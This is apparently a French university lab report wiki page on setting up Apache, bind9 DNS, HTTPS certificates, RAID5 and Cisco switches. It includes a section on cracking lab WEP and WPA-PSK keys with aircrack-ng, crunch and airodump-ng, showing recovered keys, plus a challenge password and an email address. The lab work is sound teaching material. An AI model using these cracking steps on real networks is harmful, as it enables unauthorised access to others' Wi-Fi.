=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
      CQEWH3Bhc2NhbC5jb2ludEBwb2x5dGVjaC1saWxsZS5uZXQwggEiMA0GCSqGSIb3 &lt;br /&gt;
      DQEBAQUAA4IBDwAwggEKAoIBAQDBKS9p8572UiXo2W1dAiKEKLq+B6ge/si0AhMH&lt;br /&gt;
      fLtovMz7Xvy/9oQnq25SvkWaNRuAJrvzROGS2mzkG9IEhnEpWSTNvspTO60PgNPo&lt;br /&gt;
      EUYcgKAeEuVVJyom3K3ioBOvllucQfiOIB/ykvP80s+9Wjo2vf2PkESPTjfM0zKP&lt;br /&gt;
      2JMT9cGQV6auD7NU+Ygz7w5dW/NKkU2KZA9HQ7i95+/ST3r2T0D8xP/ltEBC0Q7i&lt;br /&gt;
      U/OVkAKn6CPJ6KtkbQYvgKVG95IM5SQb/WxRVNnHKS4f+erNFYpx5iNiHhv6larV&lt;br /&gt;
      G0oR9uNsg7tOhdhcVVnooGSAsoxtgmDLwzuuho+3fS4t1K83AgMBAAGgGjAYBgkq&lt;br /&gt;
      hkiG9w0BCQcxCwwJZ2xvcGdsb3AhMA0GCSqGSIb3DQEBCwUAA4IBAQB7jtWizvBQ&lt;br /&gt;
      dNEyyVRhS563mKFo34RWW4g5tpnPC6wepQ7tvHo6gZZtzljobsWF55lRK7/Pi8eh&lt;br /&gt;
      ANyQxb1Lo9FcHJcUOEMc8heeutSZQoCslTdRNMe+uBhQ/qCLXjy+fgdptqPi9cXP&lt;br /&gt;
      zi8gBbrAQ9sHqJPK/RwhzuhCkBSzYgoNbYLjrHf8lCe60+7+0HBKM3jpTUDmzrzg&lt;br /&gt;
      Kmb8GmkgcrzKSNhlOFZpiQqBJUfK5zJEucdhJ0j7Tupwf+J2oO+TccnCNH7o1Ykc&lt;br /&gt;
      7ANKYKpf8AoCcZenLutCXt3YGjT8INuh5SnpsyR3BZUK9hNzZGK9Ilv9hwiEnmaS&lt;br /&gt;
      PQWRkLUGQdh+&lt;br /&gt;
      -----END CERTIFICATE REQUEST-----&lt;br /&gt;
&lt;br /&gt;
Puis, Gandi.net va demander une méthode de vérification sur le serveur web cible afin de savoir s'il s'agit bien de notre serveur.Il existe trois possibilités:&lt;br /&gt;
*Par verification DNS&lt;br /&gt;
*Par Mail&lt;br /&gt;
*Par fichier&lt;br /&gt;
Nous avons choisi la méthode par fichier, certes un peu longue mais ne nécessitant pas l'intervention de Monsieur Redon.&lt;br /&gt;
On copie ainsi un fichier temporaire à l'endroit indiqué par gandi et on attend que gandi valide la demande.&lt;br /&gt;
Après une verification de la part de Gandi (qui nécessite plusieurs dizaines de minutes), on obtient un certificat ('''.csr''') et le certificat intermédiaire ('''.pem''')&lt;br /&gt;
Ils sont nécessaires pour la configuration du site en HTTPS.&lt;br /&gt;
&lt;br /&gt;
=== S'assurer qu'Apache écoute le port 443 (protocole https) ===&lt;br /&gt;
On sait que le protocole HTTPS se sert du port 443 pour communiquer , verifions alors que c'est bien le cas : &lt;br /&gt;
    root@ima2a5-rex4ever:/etc/apache2# netstat -tanpu |grep &amp;quot;LISTEN&amp;quot; |grep &amp;quot;443&amp;quot;&lt;br /&gt;
    tcp6       0      0 :::443                  :::*                    LISTEN      10706/apache2&lt;br /&gt;
Le résultat indique en effet que le port 443 est ecouté par apache2, ce qui signifie qu'il ne faut pas faire de configuration supplémentaire.&lt;br /&gt;
&lt;br /&gt;
=== Activation du protocole SSL ===&lt;br /&gt;
Il faut activer le module qui gère le protocole SSL via la commande : &lt;br /&gt;
   a2enmode ssl&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
=== Configuration du VirtualHost Apache pour le protocole HTTPS ===&lt;br /&gt;
Afin de ne pas saboter la configuration HTTP déjà en place, on va dupliquer la configuration disponible dans /sites-available:&lt;br /&gt;
    cp ima2a5-rex4ever.site.conf ima2a5-rex4ever.site-ssl.conf&lt;br /&gt;
Modification :&lt;br /&gt;
   &amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
  #   General setup for the virtual host&lt;br /&gt;
     DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
     ServerName ima2a5-rex4ever.site:443                                                                                                                                                                                                          ServerAdmin pascal.coint@polytech-lille.net                                                                                                                                                                                                  ErrorLog &amp;quot;/usr/local/apache2/logs/error_log&amp;quot;                                                                                                                                                                                                 TransferLog &amp;quot;/usr/local/apache2/logs/access_log&amp;quot;                                                                                                                                                                                          # Activation du SSL                                                                                                                                                                                                                                SSLEngine On&lt;br /&gt;
    &lt;br /&gt;
    # Activation de tous les protocoles sécurisés (TLS v1.0, v1.1 et TLS v1.2) touut en désactivant les protocoles non sécurisés (SSL v2, SSL v3)&lt;br /&gt;
    SSLProtocol All -SSLv3 -SSLv2&lt;br /&gt;
    # Le navigateur devra choisir une méthode de chiffrement en respectant l'ordre indiquée dans SSLCipherSuite&lt;br /&gt;
    SSLHonorCipherOrder on&lt;br /&gt;
    &lt;br /&gt;
    # Chemin vers le certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.cer&amp;quot;&lt;br /&gt;
    SSLCACertificateFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.pem&amp;quot;&lt;br /&gt;
    # Chemin vers la clée privée du certificat SSL de votre nom de domaine&lt;br /&gt;
    SSLCertificateKeyFile &amp;quot;/etc/apache2/certificate/ima2a5-rex4ever.key&amp;quot;    &lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
On peut maintenant permuter les fichiers .conf et renommer notre ancien .conf en &amp;quot;ima2a5-rex4ever.site-http.conf&amp;quot;&lt;br /&gt;
'''Note :''' Comme vous aurez pu le remarquer, j'ai créer un dossier certificate dans lequel j'ai mis le .cer,le .csr,le.key et le .pem afin de ne pas les perdre.&lt;br /&gt;
On va ensuite décharger puis recharger le site :&lt;br /&gt;
   a2dissite ima2a5-rex4ever.site&lt;br /&gt;
   a2ensite ima2a5-rex4ever.site&lt;br /&gt;
   service apache2 restart&lt;br /&gt;
&lt;br /&gt;
Ensuite on va regarder quels sont nos sites actifs à l'aide de apache2ctl -S , ce qui retourne :&lt;br /&gt;
    *:80                   ima2a5-rex4ever.site (/etc/apache2/sites-enabled/000-default.conf:1)&lt;br /&gt;
    *:443                  ima2a5-rex4ever.site (/etc/apache2/sites-enabled/ima2a5-rex4ever.site.conf:13)&lt;br /&gt;
Le site est prêt pour le HTTPS&lt;br /&gt;
&lt;br /&gt;
=== Securisation du DNS : Le DNSSEC ===&lt;br /&gt;
Avoir un site sécurisé c'est bien , avoir toute la chaine de transmission pour éviter les fraude c'est encore mieux. Pour cela, il est possible de concevoir un DNSSEC (contraction de DNS SECURISED)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Attaque d'une installation Wi-fi ==&lt;br /&gt;
=== Description ===&lt;br /&gt;
Notre Client Wi-fi est un ordinateur portable fourni par Monsieur Redon. Il ne nécessite pas nécessairement de configuration. Cependant, la clef Wi-Fi fournie avec elle doit être paramétrée (la datasheet peut se trouver à l'adresse suivant ; [https://www.farnell.com/datasheets/1669935.pdf Datasheet]). De plus, il faut installer les paquetages nécessaire pour craquer la clef Wep et la clef WPA&lt;br /&gt;
&lt;br /&gt;
=== Installation du paquetage AirCrack-ng ===&lt;br /&gt;
Pour installer [https://doc.ubuntu-fr.org/aircrack-ng AirCrack] (utilitaire qui permet de casser les clefs WEP et WPA), il suffit de taper la commande :&lt;br /&gt;
    apt-get install aircrack-ng&lt;br /&gt;
'''Note:''' il faut auparavant configurer le réseau pour se connecter à internet.&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de '''airmon-ng''' qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
   airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
   airmong-ng start NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
   airodump-ng --encrypt wep NOMRESEAUESPIONNABLE&lt;br /&gt;
Puis à l'aide d'un second terminal, on peut stocker les informations volées dans un .txt :&lt;br /&gt;
   Airodump-ng FICHIER.txt -c 2 --bssid ADDRESSBSSID NOMRESEAUESPIONNABLE&lt;br /&gt;
Ce qui donne dans notre cas : &lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wep wlan0mon &lt;br /&gt;
   Airodump-ng -w reseau_1.txt -c 2 --bssid 04:DA:D2:50:53 wlan0mon   (&amp;lt;== pour le réseau cracotte 3)&lt;br /&gt;
&lt;br /&gt;
Commence alors le craquage de la clef Wifi en Wep. On estime qu'il faut capturer plus ou moins 50 000 datas pour approximer 50% de chance de craquer la clef.&lt;br /&gt;
Après 40 000 datas volées , on réussit à craquer la clef, il nous aura fallu environ '''14 minutes'''.&lt;br /&gt;
&lt;br /&gt;
    KEY FOUND! [BA:BE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:44:44 ]&lt;br /&gt;
    Decrypted correctly : 100%&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA-PSK ===&lt;br /&gt;
De même que précedemment, on recommence en changeant le --encrypt et on obtient :&lt;br /&gt;
   airmon-ng&lt;br /&gt;
   airmong-ng start wlan0mon&lt;br /&gt;
   airodump-ng --encrypt wpa wlan0mon &lt;br /&gt;
On obtient les informations suivantes sur notre réseau cible : &lt;br /&gt;
Channel: 2&lt;br /&gt;
SSIDName: kracotte03&lt;br /&gt;
BSSIDAdress: 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
On peut alors espionner et voler des informations avec les '''handshakes''':&lt;br /&gt;
airodump-ng -w kracotte03 -c 2 --bssid 04:DA:D2:9C:50:5A&lt;br /&gt;
&lt;br /&gt;
'''-w kracotte03''' indique que l'on souhaite tout enregistrer dans un fichier nommé '''kracotte03.'''. On obtient alors après un moment les datas volées et les informations sont extraites sous plusieurs formats. &lt;br /&gt;
Le format '''.cap''' est compatible avec l'utilitaire que nous allons utiliser, on le copie donc sur une clef USB et on va cracker la clef sur une zabeth (vitesse de calcul plus elevée).&lt;br /&gt;
Pour se faire , on construit un dictionnaire (ensemble possible de toutes les combinaisons) avec l'utilitaire Crunch via la commande :&lt;br /&gt;
   crunch 8 8 123456789 &amp;gt;&amp;gt; Dico.txt &lt;br /&gt;
Notre dictionnaire est largement simplifié car nous sommes au courant qu'il s'agit d'un ensemble de 8 chiffres de 1 a 9 , ce qui permet de préciser à crunch une taille min et max de 8 et les caractères admissibles de 1 à 9&lt;br /&gt;
Le dictionnaire est maintenant prêt, on lance alors le cassage de clef par force brute :&lt;br /&gt;
aircrack-ng psk-01.cap -w Dico.txt&lt;br /&gt;
&lt;br /&gt;
Après TREEEEEEEEEEEEEEEEEEEEEEEEEEEEEES Longtemps , on obtient la clef :&lt;br /&gt;
      [00:21:41] 10233332/102795810 keys tested (7985.18 k/s) &lt;br /&gt;
      &lt;br /&gt;
      Time left: 3 hours, 13 minutes, 12 seconds                 9.96%&lt;br /&gt;
                           KEY FOUND! [ 10233333 ]&lt;br /&gt;
      Master Key     : 5A D9 A4 39 7A 4E 14 A6 44 DE C4 AB FF 1E 63 D7 &lt;br /&gt;
                       46 7B F8 02 23 ED EA A9 82 3F 6A FC 68 DE F2 5D &lt;br /&gt;
      Transient Key  : 29 DA 59 3B EC 25 DB 6A 62 AD 50 2C 17 52 BC F8 &lt;br /&gt;
                       C9 CD 7C 85 A5 07 7E 44 84 B5 A6 EB 2E 47 B3 D0 &lt;br /&gt;
                       1C CC CC F8 24 EB 00 0A C0 7B B8 60 13 AE 57 74 &lt;br /&gt;
                       1E 15 A9 FC D7 A8 E5 C6 14 9B 01 60 E4 C4 96 43 &lt;br /&gt;
      EAPOL HMAC     : 15 99 D7 E0 33 B3 E1 4C 57 6F 8E E4 69 AF B0 08&lt;br /&gt;
&lt;br /&gt;
== Securisation d'un réseau Wi-Fi ==&lt;br /&gt;
=== Creation du Raid5 avec mdadm ===&lt;br /&gt;
Nous commencons par créer un RAID5 comme demandé dans la partie 6.1 du sujet. Pour se faire on commence par créer 3 disques de 1Go chacun:&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk1 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk2 virtual&lt;br /&gt;
   root@cordouan:~# lvcreate -L1G -n ima2a5-rex4ever-disk3 virtual&lt;br /&gt;
On éteint la machine et on recommence la même manipulation que pour la partie 3.5.1 du wiki pour attacher disk1,disk2 et disk3.&lt;br /&gt;
Nos 3 disques sont maintenant reliées à notre machine comme on le peut voir avec la commande '''fdisk -l'''&lt;br /&gt;
&lt;br /&gt;
   Disk /dev/xvdb3: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb4: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
   &lt;br /&gt;
   Disk /dev/xvdb5: 1 GiB, 1073741824 bytes, 2097152 sectors&lt;br /&gt;
   Units: sectors of 1 * 512 = 512 bytes&lt;br /&gt;
   Sector size (logical/physical): 512 bytes / 512 bytes&lt;br /&gt;
   I/O size (minimum/optimal): 512 bytes / 512 bytes&lt;br /&gt;
&lt;br /&gt;
On nous propose de réaliser le raid5 logiciel avec l'utilitaire mdadm ([https://doc.ubuntu-fr.org/raid_logiciel mdadm])&lt;br /&gt;
Assemblons maintenant nos 3 disques en un RAID5 via la commande : &lt;br /&gt;
   mdadm --create /dev/md0 --level=5  --raid-devices=3 /dev/xvdb3 /dev/xvdb4 /dev/xvdb5&lt;br /&gt;
'''Note:''' Ne pas essayer de renommer md0&lt;br /&gt;
Pour automatiser le raid5 à chaque démarrage: &lt;br /&gt;
   mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
Puis le formatage du volume RAID nouvellement créé:&lt;br /&gt;
   mkfs.ext4 /dev/md0&lt;br /&gt;
Déclarez ce volume dans `fstab` pour que le système le monte au démarrage (le système de fichier, pas le volume en lui même). Pour ce faire Editez le fichier /etc/fstab et ajoutez à sa fin la ligne :&lt;br /&gt;
   /dev/md0 	/media/raid	ext4	defaults 	0	1&lt;br /&gt;
Puis créer le fichier /media/raid qui est le fichier sur lequel le raid est monté : &lt;br /&gt;
   mkdir /media/raid&lt;br /&gt;
&lt;br /&gt;
== Architecture Réseau ==&lt;br /&gt;
&lt;br /&gt;
Dans cette partie, vous trouverez comment nous avons configuré les routeurs ainsi que les commutateurs qui se trouve dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
=== Configuration des 2 commutateurs ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au commutateur, nous avons utilisé minicom avec un cable série directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le '''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Voici quelque commandes de base qui nous ont servi pour la configuration des commutateurs&lt;br /&gt;
&lt;br /&gt;
    enable           // passage en admin pour pouvoir accéder aux données du commutateur&lt;br /&gt;
    write            // Sauvegarde de la configuration et l’implanter dans le commutateur&lt;br /&gt;
    show interface status OU sh int status  // Montre l'état de toutes les interfaces présentes sur le commutateur ainsi que les données associées&lt;br /&gt;
    configuration terminal    // permets d'accéder aux interfaces et ainsi pouvoir les modifier&lt;br /&gt;
    exit             // permets de sortir du configurateur actuel (par exemple sortir de l'interface)&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports du commutateur =====&lt;br /&gt;
&lt;br /&gt;
Nous avons 4 connexions qui sont dirigées vers le commutateur de la salle E304 ainsi que celui en E306&lt;br /&gt;
 - Un lien vers le routeur&lt;br /&gt;
 - Un lien vers la borne wifi&lt;br /&gt;
 - Un lien vers Corduan&lt;br /&gt;
 - Un lien vers l'autre commutateur&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Connexion !! E304 !! E306&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Corduan&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Borne Wifi&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Commutateur&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|Router&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| A remplir !&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour la borne wifi =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    //Rendre accessible la modification du port&lt;br /&gt;
    switchport trunk encapsulation dot1q   //Encapsule avec la trame le numéro du Vlan associé, ce qui permettra de d'avoir de quel équipement viens le paquet ainsi la réponse sera dirigé vers le bon port&lt;br /&gt;
    switchport mode trunk   //Configure le port du switch en mode trunk, ce qui permets de ne pas avoir de restriction sur les Vlan, tous les Vlan peuvent passer à travers ce port&lt;br /&gt;
    no shut    //Démarre le port ou de le garder actif&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour Corduan =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan42 //Autoriser le vlan 42 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
